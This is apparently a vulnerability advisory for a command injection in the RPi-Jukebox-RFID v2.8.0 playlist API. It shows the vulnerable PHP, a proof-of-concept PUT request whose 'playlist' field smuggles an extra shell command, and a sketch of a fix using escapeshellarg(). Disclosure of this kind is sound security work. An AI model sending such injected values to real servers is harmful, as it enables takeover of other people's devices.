### Key Information

#### Vulnerability Description

- **Vulnerability Type**: RCE (Remote Code Execution)
- **Affected Software**: RPi-Jukebox-RFID v2.8.0
- **File**: `/htdocs/api/playlist/single.php`

#### Vulnerability Details

- **Problematic Code**:

```php
$playlist = $_json['playlist'];
$single = $_json['single'];
if ($single == "true") {
    execScript("single_play.sh -c=singleenable -d=($playlist)");
} else {
    execScript("single_play.sh -c=singledisable -d=($playlist)");
}
```

- **Root Cause**: The `$playlist` variable is directly sourced from user input and concatenated into a system command without sufficient sanitization, leading to a command injection vulnerability.

#### POC (Proof of Concept)

```http
PUT /api/playlist/single.php HTTP/1.1
Host: 192.168.129.130
Content-Type: application/json
Content-Length: 89

{
  "playlist": "test;id=2.txt;echo '123'",
  "single": "true"
}
```

#### Impact

- Attackers can execute arbitrary system commands by crafting malicious `playlist` parameters, thereby gaining control over the server.

#### Vendor Information

- **Vendor**: MiczFlor/RPi-Jukebox-RFID
- **Description**: A jukebox system based on Raspberry Pi, supporting local music, podcasts, internet radio, and streaming, triggered via RFID cards, web applications, or home automation.
- **Related Links**: [Release v2.8.0](https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0)
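
#### Mitigation Sketch

For the command construction shown under Vulnerability Details, this added example (not the project's code or its official fix) validates `playlist` and passes it as a single quoted shell argument. The function name `buildSinglePlayCommand`, the length limit and the control-character policy are assumptions; the returned string is what would be handed to the project's `execScript()`.

```php
<?php
declare(strict_types=1);

/**
 * Build the single_play.sh command line from the decoded JSON body.
 * Hypothetical helper: name and validation policy are assumptions.
 */
function buildSinglePlayCommand(array $json): string
{
    $playlist = $json['playlist'] ?? null;
    $single   = $json['single'] ?? null;

    // Accept only a non-empty string of bounded length.
    if (!is_string($playlist) || $playlist === '' || strlen($playlist) > 255) {
        throw new InvalidArgumentException('playlist must be a non-empty string');
    }
    // Reject control characters (NUL, CR, LF, ...); a playlist name never needs them.
    if (preg_match('/[\x00-\x1F\x7F]/', $playlist) === 1) {
        throw new InvalidArgumentException('playlist contains control characters');
    }

    // Strict comparison: only "true" or boolean true selects singleenable.
    $mode = ($single === 'true' || $single === true) ? 'singleenable' : 'singledisable';

    // escapeshellarg() wraps the value in single quotes and escapes embedded
    // quotes, so ; | & $() and backticks arrive as literal characters of one
    // argument instead of being interpreted by the shell.
    return 'single_play.sh -c=' . $mode . ' -d=' . escapeshellarg($playlist);
}

// Constructed sample input: the playlist value from the PoC request.
$poc = ['playlist' => "test;id=2.txt;echo '123'", 'single' => 'true'];
echo buildSinglePlayCommand($poc), PHP_EOL;

// Constructed sample input: a non-string value is refused outright.
try {
    buildSinglePlayCommand(['playlist' => ['a', 'b'], 'single' => 'true']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Quoting covers only the PHP-to-shell boundary; `single_play.sh` must also treat the `-d` value as data (quoted expansions, no `eval`).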